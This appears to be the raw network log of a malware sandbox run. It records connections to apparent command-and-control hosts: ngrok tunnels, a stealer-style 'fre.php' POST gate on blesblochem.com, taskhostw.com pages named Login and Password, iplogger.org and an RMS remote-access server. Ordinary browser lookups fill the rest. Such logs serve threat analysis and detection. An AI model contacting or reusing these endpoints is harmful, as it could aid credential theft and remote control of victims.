18.190.63.84:19521

0.tcp.ngrok.io

485 B
132 B
3
3
95.165.168.168:8444

495 B
292 B
8
7
193.161.193.99:22603

98 B
92 B
2
2
193.161.193.99:22603

98 B
92 B
2
2
204.79.197.200:443

ieonline.microsoft.com

tls

2.4kB
28.7kB
36
34
204.79.197.200:443

ieonline.microsoft.com

tls

1.2kB
8.2kB
16
14
158.222.211.81:8080

449 B
292 B
7
7
193.161.193.99:22603

98 B
92 B
2
2
193.161.193.99:22603

98 B
92 B
2
2
168.61.222.215:5400

236 B
212 B
5
5
193.161.193.99:22603

98 B
92 B
2
2
193.161.193.99:22603

98 B
92 B
2
2
193.161.193.99:22603

98 B
92 B
2
2
193.161.193.99:22603

98 B
92 B
2
2
193.161.193.99:22603

158 B
132 B
3
3
95.165.168.168:8444

449 B
252 B
7
6
193.161.193.99:22603

158 B
132 B
3
3
193.161.193.99:22603

98 B
92 B
2
2
158.222.211.81:8080

403 B
252 B
6
6
152.89.218.85:80

http://taskhostw.com/L.html

http

320 B
364 B
5
3

HTTP Request

GET http://taskhostw.com/L.html

HTTP Response

200
193.161.193.99:22603

499 B
292 B
7
7
18.190.63.84:19521

0.tcp.ngrok.io

144 B
52 B
3
1
95.213.205.83:5655

rms-server.tektonit.ru

1.2kB
364 B
7
6
142.250.27.26:25

smtp.google.com

smtp

276 B
634 B
5
7
172.67.74.161:443

iplogger.org

tls

1.3kB
14.2kB
21
19
18.190.63.84:19521

0.tcp.ngrok.io

98 B
92 B
2
2
18.208.156.248:80

http://blesblochem.com/two/gates1/fre.php

http

828 B
598 B
5
5

HTTP Request

POST http://blesblochem.com/two/gates1/fre.php

HTTP Response

200
95.165.168.168:8444

357 B
212 B
5
5
18.208.156.248:80

http://blesblochem.com/two/gates1/fre.php

http

650 B
598 B
5
5

HTTP Request

POST http://blesblochem.com/two/gates1/fre.php

HTTP Response

200
18.208.156.248:80

http://blesblochem.com/two/gates1/fre.php

http

623 B
598 B
5
5

HTTP Request

POST http://blesblochem.com/two/gates1/fre.php

HTTP Response

200
18.190.63.84:19521

0.tcp.ngrok.io

98 B
92 B
2
2
3.12.245.36:19521

0.tcp.ngrok.io

98 B
92 B
2
2
158.222.211.81:8080

357 B
212 B
5
5
142.250.102.27:25

aspmx.l.google.com

smtp

277 B
630 B
5
7
3.12.245.36:19521

0.tcp.ngrok.io

98 B
92 B
2
2
3.12.245.36:19521

0.tcp.ngrok.io

98 B
92 B
2
2
152.89.218.85:80

http://taskhostw.com/randomink/Server.html

http

1.1kB
1.9kB
13
13

HTTP Request

GET http://taskhostw.com/randomink/STATUS.html

HTTP Response

200

HTTP Request

GET http://taskhostw.com/randomink/loaderTOP.html

HTTP Response

404

HTTP Request

GET http://taskhostw.com/randomink/Login.html

HTTP Response

200

HTTP Request

GET http://taskhostw.com/randomink/Password.html

HTTP Response

200

HTTP Request

GET http://taskhostw.com/randomink/Server.html

HTTP Response

200
66.96.162.135:80

http://middlechrist.com/html/license_43EC922A3D0E1F403834ED436BA90C5A686E606FE2C68C471F4CE42C93524A733C47010287CE9159E8D69FE5469C45CA6C2FF8970E4D13204AFCE98A1C5A9C2924CF3F64589D6F483DBE74DEAC659155AFACD072A8A8C9A60753446BBC05BCE0834533DE29D58BC16F58EC50AF1B8F1CFA3507B15E8135AAC7171CE5F96FA84746E92323F61458717D6B468CF2B1FB6A5A1BDBC2824E342C7F0901FEF80DADE0F16E3771C2656C3CDDEB426276894549F790D3AA834E44D67548DA87C8F6160E738FDEC08856AAFD42B6CD19D74FD2ACF5AB278A644BEC1557A268610430E05B10945B8AD7B62A8379B43CCC086589BA07A85C692738F1940782BCBBDB8D029020409D436270C4E7D0A305D7FB980BB976EEF3E7A87794BDA541C65C9BAF239D9BCD129BC39E175F9CB4F7201FC8BDC1EB43CEE805A16896A9EBE67968E16D5710ECA15C385C08D07C2098879C326E3DB0A9E53C98F6A9E77E119B183EF935DD36B5D008B4A2282D18C8FBC18F41708F0372692D405D50FA3A59B02A906FB3FCBD885A70E6D1C07B8C3C085CB0AF7F520CAB3D4DA58D0F2AA0401DF0B6A4CA6C589C87B4B16F6C2B8795151CDC5A2108C98F853355C94986C9CEBC1726E014C2CDC2336CD9ABF970DC23FB1D62C47B905CD14B6FB5C0C1C557BB00F6096100E09F679D148FE74345E20B8A3178823D646E04D704EAE3B43CFCF21643597BCD59.html

http

2.4kB
2.9kB
8
6

HTTP Request

GET http://middlechrist.com/html/license_43EC922A3D0E1F403834ED436BA90C5A686E606FE2C68C471F4CE42C93524A733C47010287CE9159E8D69FE5469C45CA6C2FF8970E4D13204AFCE98A1C5A9C2924CF3F64589D6F483DBE74DEAC659155AFACD072A8A8C9A60753446BBC05BCE0834533DE29D58BC16F58EC50AF1B8F1CFA3507B15E8135AAC7171CE5F96FA84746E92323F61458717D6B468CF2B1FB6A5A1BDBC2824E342C7F0901FEF80DADE0F16E3771C2656C3CDDEB426276894549F790D3AA834E44D67548DA87C8F6160E738FDEC08856AAFD42B6CD19D74FD2ACF5AB278A644BEC1557A268610430E05B10945B8AD7B62A8379B43CCC086589BA07A85C692738F1940782BCBBDB8D029020409D436270C4E7D0A305D7FB980BB976EEF3E7A87794BDA541C65C9BAF239D9BCD129BC39E175F9CB4F7201FC8BDC1EB43CEE805A16896A9EBE67968E16D5710ECA15C385C08D07C2098879C326E3DB0A9E53C98F6A9E77E119B183EF935DD36B5D008B4A2282D18C8FBC18F41708F0372692D405D.html

HTTP Response

406

HTTP Request

GET http://middlechrist.com/html/license_43EC922A3D0E1F403834ED436BA90C5A686E606FE2C68C471F4CE42C93524A733C47010287CE9159E8D69FE5469C45CA6C2FF8970E4D13204AFCE98A1C5A9C2924CF3F64589D6F483DBE74DEAC659155AFACD072A8A8C9A60753446BBC05BCE0834533DE29D58BC16F58EC50AF1B8F1CFA3507B15E8135AAC7171CE5F96FA84746E92323F61458717D6B468CF2B1FB6A5A1BDBC2824E342C7F0901FEF80DADE0F16E3771C2656C3CDDEB426276894549F790D3AA834E44D67548DA87C8F6160E738FDEC08856AAFD42B6CD19D74FD2ACF5AB278A644BEC1557A268610430E05B10945B8AD7B62A8379B43CCC086589BA07A85C692738F1940782BCBBDB8D029020409D436270C4E7D0A305D7FB980BB976EEF3E7A87794BDA541C65C9BAF239D9BCD129BC39E175F9CB4F7201FC8BDC1EB43CEE805A16896A9EBE67968E16D5710ECA15C385C08D07C2098879C326E3DB0A9E53C98F6A9E77E119B183EF935DD36B5D008B4A2282D18C8FBC18F41708F0372692D405D50FA3A59B02A906FB3FCBD885A70E6D1C07B8C3C085CB0AF7F520CAB3D4DA58D0F2AA0401DF0B6A4CA6C589C87B4B16F6C2B8795151CDC5A2108C98F853355C94986C9CEBC1726E014C2CDC2336CD9ABF970DC23FB1D62C47B905CD14B6FB5C0C1C557BB00F6096100E09F679D148FE74345E20B8A3178823D646E04D704EAE3B43CFCF21643597BCD59.html

HTTP Response

406
193.161.193.99:22603

98 B
92 B
2
2
193.161.193.99:22603

98 B
92 B
2
2
193.161.193.99:22603

98 B
92 B
2
2
3.12.245.36:19521

0.tcp.ngrok.io

98 B
92 B
2
2
193.161.193.99:22603

98 B
92 B
2
2
3.12.245.36:19521

0.tcp.ngrok.io

98 B
92 B
2
2
193.161.193.99:22603

98 B
92 B
2
2
3.12.245.36:19521

0.tcp.ngrok.io

98 B
92 B
2
2
3.12.245.36:19521

0.tcp.ngrok.io

98 B
92 B
2
2
193.161.193.99:22603

98 B
92 B
2
2
3.12.245.36:19521

0.tcp.ngrok.io

98 B
92 B
2
2
109.248.203.81:21

144 B
132 B
3
3
3.12.245.36:19521

0.tcp.ngrok.io

98 B
92 B
2
2
193.161.193.99:22603

98 B
92 B
2
2
193.161.193.99:22603

98 B
92 B
2
2
3.12.245.36:19521

0.tcp.ngrok.io

98 B
92 B
2
2
3.12.245.36:19521

0.tcp.ngrok.io

98 B
92 B
2
2
3.12.245.36:19521

0.tcp.ngrok.io

505 B
132 B
3
3
193.161.193.99:22603

98 B
92 B
2
2
95.165.168.168:8444

311 B
172 B
4
4
193.161.193.99:22603

98 B
92 B
2
2
193.161.193.99:22603

98 B
92 B
2
2
158.222.211.81:8080

311 B
172 B
4
4
3.12.245.36:19521

0.tcp.ngrok.io

461 B
132 B
3
3
193.161.193.99:22603

98 B
92 B
2
2
193.161.193.99:22603

98 B
92 B
2
2

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

13.86.106.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

13.86.106.20.in-addr.arpa
8.8.8.8:53

bloxflip.com

dns

msedge.exe

58 B
90 B
1
1

DNS Request

bloxflip.com

DNS Response

104.18.30.95

104.18.31.95
8.8.8.8:53

95.30.18.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

95.30.18.104.in-addr.arpa
8.8.8.8:53

2.159.190.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

2.159.190.20.in-addr.arpa
8.8.8.8:53

83.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

83.210.23.2.in-addr.arpa
224.0.0.251:5353

1.4kB
22
8.8.8.8:53

154.239.44.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

154.239.44.20.in-addr.arpa
8.8.8.8:53

212.20.149.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

212.20.149.52.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

98.117.19.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

98.117.19.2.in-addr.arpa
8.8.8.8:53

135.128.123.92.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

135.128.123.92.in-addr.arpa
8.8.8.8:53

ppornhub.com

dns

msedge.exe

58 B
74 B
1
1

DNS Request

ppornhub.com

DNS Response

66.254.114.210
8.8.8.8:53

www.pornhub.com

dns

msedge.exe

61 B
91 B
1
1

DNS Request

www.pornhub.com

DNS Response

66.254.114.41
8.8.8.8:53

210.114.254.66.in-addr.arpa

dns

73 B
114 B
1
1

DNS Request

210.114.254.66.in-addr.arpa
8.8.8.8:53

static.trafficjunky.com

dns

msedge.exe

69 B
246 B
1
1

DNS Request

static.trafficjunky.com

DNS Response

64.210.156.19

64.210.156.17

64.210.156.16

64.210.156.21

64.210.156.23

64.210.156.22

64.210.156.18

64.210.156.20
8.8.8.8:53

ei.phncdn.com

dns

msedge.exe

59 B
226 B
1
1

DNS Request

ei.phncdn.com

DNS Response

64.210.156.21

64.210.156.18

64.210.156.19

64.210.156.17

64.210.156.23

64.210.156.22

64.210.156.20

64.210.156.16
8.8.8.8:53

41.114.254.66.in-addr.arpa

dns

72 B
113 B
1
1

DNS Request

41.114.254.66.in-addr.arpa
8.8.8.8:53

19.156.210.64.in-addr.arpa

dns

72 B
141 B
1
1

DNS Request

19.156.210.64.in-addr.arpa
8.8.8.8:53

21.156.210.64.in-addr.arpa

dns

72 B
141 B
1
1

DNS Request

21.156.210.64.in-addr.arpa
8.8.8.8:53

media.trafficjunky.net

dns

msedge.exe

68 B
247 B
1
1

DNS Request

media.trafficjunky.net

DNS Response

64.210.156.16

64.210.156.17

64.210.156.21

64.210.156.18

64.210.156.23

64.210.156.19

64.210.156.20

64.210.156.22
8.8.8.8:53

prvc.io

dns

msedge.exe

53 B
85 B
1
1

DNS Request

prvc.io

DNS Response

104.21.56.52

172.67.177.254
8.8.8.8:53

cdn1-smallimg.phncdn.com

dns

msedge.exe

70 B
109 B
1
1

DNS Request

cdn1-smallimg.phncdn.com

DNS Response

66.254.114.156
8.8.8.8:53

ss.phncdn.com

dns

msedge.exe

59 B
226 B
1
1

DNS Request

ss.phncdn.com

DNS Response

64.210.156.18

64.210.156.20

64.210.156.21

64.210.156.16

64.210.156.17

64.210.156.23

64.210.156.22

64.210.156.19
8.8.8.8:53

a.adtng.com

dns

msedge.exe

57 B
73 B
1
1

DNS Request

a.adtng.com

DNS Response

66.254.114.171
8.8.8.8:53

156.114.254.66.in-addr.arpa

dns

73 B
114 B
1
1

DNS Request

156.114.254.66.in-addr.arpa
8.8.8.8:53

16.156.210.64.in-addr.arpa

dns

72 B
141 B
1
1

DNS Request

16.156.210.64.in-addr.arpa
8.8.8.8:53

72.204.58.216.in-addr.arpa

dns

72 B
169 B
1
1

DNS Request

72.204.58.216.in-addr.arpa
8.8.8.8:53

52.56.21.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

52.56.21.104.in-addr.arpa
8.8.8.8:53

ht-cdn2.adtng.com

dns

msedge.exe

63 B
234 B
1
1

DNS Request

ht-cdn2.adtng.com

DNS Response

64.210.156.21

64.210.156.23

64.210.156.18

64.210.156.16

64.210.156.22

64.210.156.19

64.210.156.17

64.210.156.20
8.8.8.8:53

hw-cdn2.adtng.com

dns

msedge.exe

63 B
234 B
1
1

DNS Request

hw-cdn2.adtng.com

DNS Response

64.210.156.4

64.210.156.5

64.210.156.0

64.210.156.6

64.210.156.2

64.210.156.3

64.210.156.7

64.210.156.1
8.8.8.8:53

171.114.254.66.in-addr.arpa

dns

73 B
114 B
1
1

DNS Request

171.114.254.66.in-addr.arpa
8.8.8.8:53

4.156.210.64.in-addr.arpa

dns

71 B
140 B
1
1

DNS Request

4.156.210.64.in-addr.arpa
8.8.8.8:53

storage.googleapis.com

dns

msedge.exe

68 B
324 B
1
1

DNS Request

storage.googleapis.com

DNS Response

142.250.179.251

142.250.187.219

216.58.213.27

142.250.187.251

216.58.212.251

216.58.212.219

142.250.178.27

172.217.169.27

216.58.201.123

142.250.200.27

216.58.204.91

142.250.180.27

172.217.16.251

172.217.169.59

142.250.200.59

172.217.169.91
8.8.8.8:53

251.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

251.179.250.142.in-addr.arpa
8.8.8.8:53

stats.g.doubleclick.net

dns

msedge.exe

69 B
133 B
1
1

DNS Request

stats.g.doubleclick.net

DNS Response

64.233.166.155

64.233.166.154

64.233.166.156

64.233.166.157
8.8.8.8:53

analytics.google.com

dns

msedge.exe

66 B
82 B
1
1

DNS Request

analytics.google.com

DNS Response

142.250.200.14
8.8.8.8:53

14.200.250.142.in-addr.arpa

dns

73 B
112 B
1
1

DNS Request

14.200.250.142.in-addr.arpa
8.8.8.8:53

155.166.233.64.in-addr.arpa

dns

73 B
107 B
1
1

DNS Request

155.166.233.64.in-addr.arpa
8.8.8.8:53

ew.phncdn.com

dns

msedge.exe

59 B
226 B
1
1

DNS Request

ew.phncdn.com

DNS Response

64.210.156.20

64.210.156.23

64.210.156.16

64.210.156.22

64.210.156.17

64.210.156.21

64.210.156.19

64.210.156.18
142.250.200.14:443

analytics.google.com

https

msedge.exe

6.9kB
5
8.8.8.8:53

track.thuis.nl

dns

msedge.exe

60 B
167 B
1
1

DNS Request

track.thuis.nl

DNS Response

18.172.88.11

18.172.88.78

18.172.88.39

18.172.88.47
8.8.8.8:53

cdn1d-static-shared.phncdn.com

dns

msedge.exe

76 B
260 B
1
1

DNS Request

cdn1d-static-shared.phncdn.com

DNS Response

64.210.156.22

64.210.156.18

64.210.156.19

64.210.156.23

64.210.156.16

64.210.156.21

64.210.156.17

64.210.156.20
8.8.8.8:53

11.88.172.18.in-addr.arpa

dns

71 B
127 B
1
1

DNS Request

11.88.172.18.in-addr.arpa
8.8.8.8:53

eg-cdn.trafficjunky.net

dns

msedge.exe

69 B
119 B
1
1

DNS Request

eg-cdn.trafficjunky.net

DNS Response

93.184.223.43
8.8.8.8:53

ht-cdn.trafficjunky.net

dns

msedge.exe

69 B
249 B
1
1

DNS Request

ht-cdn.trafficjunky.net

DNS Response

64.210.156.23

64.210.156.21

64.210.156.20

64.210.156.18

64.210.156.16

64.210.156.22

64.210.156.19

64.210.156.17
8.8.8.8:53

etahub.com

dns

msedge.exe

56 B
72 B
1
1

DNS Request

etahub.com

DNS Response

66.254.114.62
8.8.8.8:53

evtubescms.phncdn.com

dns

msedge.exe

67 B
242 B
1
1

DNS Request

evtubescms.phncdn.com

DNS Response

64.210.156.0

64.210.156.6

64.210.156.7

64.210.156.1

64.210.156.4

64.210.156.3

64.210.156.5

64.210.156.2
8.8.8.8:53

33.4.157.108.in-addr.arpa

dns

71 B
127 B
1
1

DNS Request

33.4.157.108.in-addr.arpa
8.8.8.8:53

195.212.58.216.in-addr.arpa

dns

73 B
171 B
1
1

DNS Request

195.212.58.216.in-addr.arpa
8.8.8.8:53

43.223.184.93.in-addr.arpa

dns

72 B
143 B
1
1

DNS Request

43.223.184.93.in-addr.arpa
8.8.8.8:53

23.156.210.64.in-addr.arpa

dns

72 B
141 B
1
1

DNS Request

23.156.210.64.in-addr.arpa
8.8.8.8:53

62.114.254.66.in-addr.arpa

dns

72 B
113 B
1
1

DNS Request

62.114.254.66.in-addr.arpa
8.8.8.8:53

0.156.210.64.in-addr.arpa

dns

189 B
548 B
3
3

DNS Request

0.156.210.64.in-addr.arpa

DNS Request

www2.bing.com

DNS Request

www2.bing.com

DNS Response

204.79.197.200

13.107.21.200

DNS Response

13.107.21.200

204.79.197.200
8.8.8.8:53

pix-ht.trafficjunky.net

dns

msedge.exe

69 B
249 B
1
1

DNS Request

pix-ht.trafficjunky.net

DNS Response

64.210.156.21

64.210.156.19

64.210.156.16

64.210.156.17

64.210.156.22

64.210.156.20

64.210.156.23

64.210.156.18
8.8.8.8:53

19.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

19.229.111.52.in-addr.arpa
8.8.8.8:53

cdn.jsdelivr.net

dns

msedge.exe

62 B
160 B
1
1

DNS Request

cdn.jsdelivr.net

DNS Response

151.101.193.229

151.101.129.229

151.101.65.229

151.101.1.229
8.8.8.8:53

cv-h.phncdn.com

dns

msedge.exe

61 B
108 B
1
1

DNS Request

cv-h.phncdn.com

DNS Response

152.195.34.118
8.8.8.8:53

133.2.101.151.in-addr.arpa

dns

144 B
132 B
2
1

DNS Request

133.2.101.151.in-addr.arpa

DNS Request

133.2.101.151.in-addr.arpa
8.8.8.8:53

229.193.101.151.in-addr.arpa

dns

74 B
134 B
1
1

DNS Request

229.193.101.151.in-addr.arpa
8.8.8.8:53

118.34.195.152.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

118.34.195.152.in-addr.arpa
8.8.8.8:53

pix-cdn77.trafficjunky.net

dns

msedge.exe

72 B
126 B
1
1

DNS Request

pix-cdn77.trafficjunky.net

DNS Response

143.244.57.57
8.8.8.8:53

57.57.244.143.in-addr.arpa

dns

72 B
109 B
1
1

DNS Request

57.57.244.143.in-addr.arpa
8.8.8.8:53

189.128.123.92.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

189.128.123.92.in-addr.arpa
8.8.8.8:53

th.bing.com

dns

msedge.exe

114 B
318 B
2
1

DNS Request

th.bing.com

DNS Request

th.bing.com

DNS Response

92.123.128.162

92.123.128.158

92.123.128.167

92.123.128.164

92.123.128.166

92.123.128.165

92.123.128.163

92.123.128.161

92.123.128.168
8.8.8.8:53

r.bing.com

dns

msedge.exe

234 B
502 B
4
3

DNS Request

r.bing.com

DNS Request

r.bing.com

DNS Response

92.123.128.164

92.123.128.170

92.123.128.169

92.123.128.171

92.123.128.163

92.123.128.167

92.123.128.166

92.123.128.165

92.123.128.168

DNS Request

api.hubspot.com

DNS Request

api.hubspot.com

DNS Response

104.16.117.116

104.16.118.116

DNS Response

104.16.118.116

104.16.117.116
8.8.8.8:53

162.128.123.92.in-addr.arpa

dns

146 B
139 B
2
1

DNS Request

162.128.123.92.in-addr.arpa

DNS Request

162.128.123.92.in-addr.arpa
8.8.8.8:53

164.128.123.92.in-addr.arpa

dns

146 B
139 B
2
1

DNS Request

164.128.123.92.in-addr.arpa

DNS Request

164.128.123.92.in-addr.arpa
8.8.8.8:53

s.bingparachute.com

dns

msedge.exe

130 B
320 B
2
2

DNS Request

s.bingparachute.com

DNS Request

s.bingparachute.com

DNS Response

23.204.237.191

DNS Response

23.204.237.191
8.8.8.8:53

aefd.nelreports.net

dns

msedge.exe

130 B
348 B
2
2

DNS Request

aefd.nelreports.net

DNS Request

aefd.nelreports.net

DNS Response

2.19.117.148

2.19.117.143

DNS Response

2.19.117.148

2.19.117.143
8.8.8.8:53

191.237.204.23.in-addr.arpa

dns

146 B
278 B
2
2

DNS Request

191.237.204.23.in-addr.arpa

DNS Request

191.237.204.23.in-addr.arpa
8.8.8.8:53

148.117.19.2.in-addr.arpa

dns

142 B
270 B
2
2

DNS Request

148.117.19.2.in-addr.arpa

DNS Request

148.117.19.2.in-addr.arpa
8.8.8.8:53

login.microsoftonline.com

dns

msedge.exe

71 B
306 B
1
1

DNS Request

login.microsoftonline.com

DNS Response

20.190.160.14

40.126.32.76

20.190.160.17

40.126.32.136

40.126.32.72

20.190.160.20

40.126.32.138

40.126.32.140
8.8.8.8:53

14.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.160.190.20.in-addr.arpa
8.8.8.8:53

74.32.126.40.in-addr.arpa

dns

142 B
314 B
2
2

DNS Request

74.32.126.40.in-addr.arpa

DNS Request

74.32.126.40.in-addr.arpa
8.8.8.8:53

200.197.79.204.in-addr.arpa

dns

146 B
212 B
2
2

DNS Request

200.197.79.204.in-addr.arpa

DNS Request

200.197.79.204.in-addr.arpa
8.8.8.8:53

github.com

dns

msedge.exe

112 B
144 B
2
2

DNS Request

github.com

DNS Request

github.com

DNS Response

20.26.156.215

DNS Response

20.26.156.215
8.8.8.8:53

215.156.26.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

215.156.26.20.in-addr.arpa
8.8.8.8:53

avatars.githubusercontent.com

dns

msedge.exe

150 B
278 B
2
2

DNS Request

avatars.githubusercontent.com

DNS Request

avatars.githubusercontent.com

DNS Response

185.199.109.133

185.199.111.133

185.199.110.133

185.199.108.133

DNS Response

185.199.109.133

185.199.108.133

185.199.111.133

185.199.110.133
8.8.8.8:53

github.githubassets.com

dns

msedge.exe

138 B
266 B
2
2

DNS Request

github.githubassets.com

DNS Request

github.githubassets.com

DNS Response

185.199.111.154

185.199.108.154

185.199.109.154

185.199.110.154

DNS Response

185.199.108.154

185.199.109.154

185.199.111.154

185.199.110.154
8.8.8.8:53

github-cloud.s3.amazonaws.com

dns

msedge.exe

150 B
506 B
2
2

DNS Request

github-cloud.s3.amazonaws.com

DNS Request

github-cloud.s3.amazonaws.com

DNS Response

52.216.136.107

3.5.1.162

54.231.160.193

52.216.205.3

3.5.29.180

16.15.176.142

3.5.29.128

52.217.84.220

DNS Response

52.216.241.4

54.231.234.41

52.217.226.25

3.5.27.221

16.15.194.197

52.217.232.49

3.5.27.236

54.231.203.177
8.8.8.8:53

user-images.githubusercontent.com

dns

msedge.exe

158 B
286 B
2
2

DNS Request

user-images.githubusercontent.com

DNS Request

user-images.githubusercontent.com

DNS Response

185.199.111.133

185.199.109.133

185.199.110.133

185.199.108.133

DNS Response

185.199.110.133

185.199.109.133

185.199.111.133

185.199.108.133
8.8.8.8:53

133.109.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.109.199.185.in-addr.arpa
8.8.8.8:53

154.111.199.185.in-addr.arpa

dns

148 B
236 B
2
2

DNS Request

154.111.199.185.in-addr.arpa

DNS Request

154.111.199.185.in-addr.arpa
8.8.8.8:53

collector.github.com

dns

msedge.exe

132 B
230 B
2
2

DNS Request

collector.github.com

DNS Response

140.82.112.21

DNS Request

collector.github.com

DNS Response

140.82.113.22
8.8.8.8:53

api.github.com

dns

msedge.exe

120 B
152 B
2
2

DNS Request

api.github.com

DNS Request

api.github.com

DNS Response

20.26.156.210

DNS Response

20.26.156.210
8.8.8.8:53

21.112.82.140.in-addr.arpa

dns

144 B
234 B
2
2

DNS Request

21.112.82.140.in-addr.arpa

DNS Request

21.112.82.140.in-addr.arpa
8.8.8.8:53

210.156.26.20.in-addr.arpa

dns

144 B
316 B
2
2

DNS Request

210.156.26.20.in-addr.arpa

DNS Request

210.156.26.20.in-addr.arpa
8.8.8.8:53

codeload.github.com

dns

msedge.exe

130 B
81 B
2
1

DNS Request

codeload.github.com

DNS Request

codeload.github.com

DNS Response

20.26.156.216
8.8.8.8:53

216.156.26.20.in-addr.arpa

dns

216 B
158 B
3
1

DNS Request

216.156.26.20.in-addr.arpa

DNS Request

216.156.26.20.in-addr.arpa

DNS Request

216.156.26.20.in-addr.arpa
2.19.117.148:443

aefd.nelreports.net

https

msedge.exe

6.9kB
5
8.8.8.8:53

api.github.com

dns

msedge.exe

120 B
76 B
2
1

DNS Request

api.github.com

DNS Request

api.github.com

DNS Response

20.26.156.210
8.8.8.8:53

r.bing.com

dns

msedge.exe

112 B
632 B
2
2

DNS Request

r.bing.com

DNS Request

r.bing.com

DNS Response

92.123.128.147

92.123.128.139

92.123.128.149

92.123.128.145

92.123.128.148

92.123.128.150

92.123.128.144

92.123.128.146

92.123.128.140

DNS Response

92.123.128.150

92.123.128.145

92.123.128.149

92.123.128.139

92.123.128.140

92.123.128.147

92.123.128.148

92.123.128.146

92.123.128.144
8.8.8.8:53

th.bing.com

dns

msedge.exe

114 B
636 B
2
2

DNS Request

th.bing.com

DNS Request

th.bing.com

DNS Response

92.123.128.146

92.123.128.145

92.123.128.138

92.123.128.149

92.123.128.148

92.123.128.144

92.123.128.140

92.123.128.147

92.123.128.137

DNS Response

92.123.128.140

92.123.128.148

92.123.128.145

92.123.128.144

92.123.128.149

92.123.128.138

92.123.128.146

92.123.128.137

92.123.128.147
8.8.8.8:53

132.128.123.92.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

132.128.123.92.in-addr.arpa
8.8.8.8:53

146.128.123.92.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

146.128.123.92.in-addr.arpa
8.8.8.8:53

www.anydesk.com

dns

msedge.exe

122 B
250 B
2
2

DNS Request

www.anydesk.com

DNS Request

www.anydesk.com

DNS Response

18.66.248.51

18.66.248.79

18.66.248.25

18.66.248.74

DNS Response

18.66.248.51

18.66.248.74

18.66.248.79

18.66.248.25
8.8.8.8:53

51.248.66.18.in-addr.arpa

dns

142 B
254 B
2
2

DNS Request

51.248.66.18.in-addr.arpa

DNS Request

51.248.66.18.in-addr.arpa
8.8.8.8:53

anydesk.com

dns

msedge.exe

114 B
242 B
2
2

DNS Request

anydesk.com

DNS Request

anydesk.com

DNS Response

18.66.248.79

18.66.248.25

18.66.248.51

18.66.248.74

DNS Response

18.66.248.51

18.66.248.74

18.66.248.79

18.66.248.25
8.8.8.8:53

ad-wa.anydesk.com

dns

msedge.exe

126 B
158 B
2
2

DNS Request

ad-wa.anydesk.com

DNS Request

ad-wa.anydesk.com

DNS Response

167.235.224.171

DNS Response

167.235.224.171
8.8.8.8:53

js.hs-scripts.com

dns

msedge.exe

126 B
286 B
2
2

DNS Request

js.hs-scripts.com

DNS Request

js.hs-scripts.com

DNS Response

104.16.139.209

104.16.138.209

104.16.137.209

104.16.140.209

104.16.141.209

DNS Response

104.16.139.209

104.16.137.209

104.16.141.209

104.16.140.209

104.16.138.209
8.8.8.8:53

www.recaptcha.net

dns

msedge.exe

126 B
158 B
2
2

DNS Request

www.recaptcha.net

DNS Request

www.recaptcha.net

DNS Response

172.217.169.67

DNS Response

172.217.169.67
8.8.8.8:53

tracking.g2crowd.com

dns

msedge.exe

132 B
196 B
2
2

DNS Request

tracking.g2crowd.com

DNS Request

tracking.g2crowd.com

DNS Response

104.18.30.176

104.18.31.176

DNS Response

104.18.31.176

104.18.30.176
8.8.8.8:53

js.hubspot.com

dns

msedge.exe

120 B
184 B
2
2

DNS Request

js.hubspot.com

DNS Request

js.hubspot.com

DNS Response

104.16.117.116

104.16.118.116

DNS Response

104.16.118.116

104.16.117.116
8.8.8.8:53

js.usemessages.com

dns

msedge.exe

128 B
288 B
2
2

DNS Request

js.usemessages.com

DNS Request

js.usemessages.com

DNS Response

104.16.78.142

104.16.76.142

104.16.75.142

104.16.79.142

104.16.77.142

DNS Response

104.16.79.142

104.16.76.142

104.16.75.142

104.16.77.142

104.16.78.142
8.8.8.8:53

js.hs-analytics.net

dns

msedge.exe

130 B
194 B
2
2

DNS Request

js.hs-analytics.net

DNS Request

js.hs-analytics.net

DNS Response

104.16.160.168

104.17.175.201

DNS Response

104.16.160.168

104.17.175.201
8.8.8.8:53

171.224.235.167.in-addr.arpa

dns

148 B
266 B
2
2

DNS Request

171.224.235.167.in-addr.arpa

DNS Request

171.224.235.167.in-addr.arpa
8.8.8.8:53

67.169.217.172.in-addr.arpa

dns

146 B
222 B
2
2

DNS Request

67.169.217.172.in-addr.arpa

DNS Request

67.169.217.172.in-addr.arpa
8.8.8.8:53

209.139.16.104.in-addr.arpa

dns

146 B
270 B
2
2

DNS Request

209.139.16.104.in-addr.arpa

DNS Request

209.139.16.104.in-addr.arpa
8.8.8.8:53

176.30.18.104.in-addr.arpa

dns

144 B
268 B
2
2

DNS Request

176.30.18.104.in-addr.arpa

DNS Request

176.30.18.104.in-addr.arpa
8.8.8.8:53

js.hs-banner.com

dns

msedge.exe

124 B
188 B
2
2

DNS Request

js.hs-banner.com

DNS Request

js.hs-banner.com

DNS Response

104.18.40.240

172.64.147.16

DNS Response

172.64.147.16

104.18.40.240
172.217.169.67:443

www.recaptcha.net

https

msedge.exe

6.9kB
5
8.8.8.8:53

cdn.cookielaw.org

dns

msedge.exe

126 B
190 B
2
2

DNS Request

cdn.cookielaw.org

DNS Request

cdn.cookielaw.org

DNS Response

104.18.87.42

104.18.86.42

DNS Response

104.18.87.42

104.18.86.42
8.8.8.8:53

cta-service-cms2.hubspot.com

dns

msedge.exe

148 B
212 B
2
2

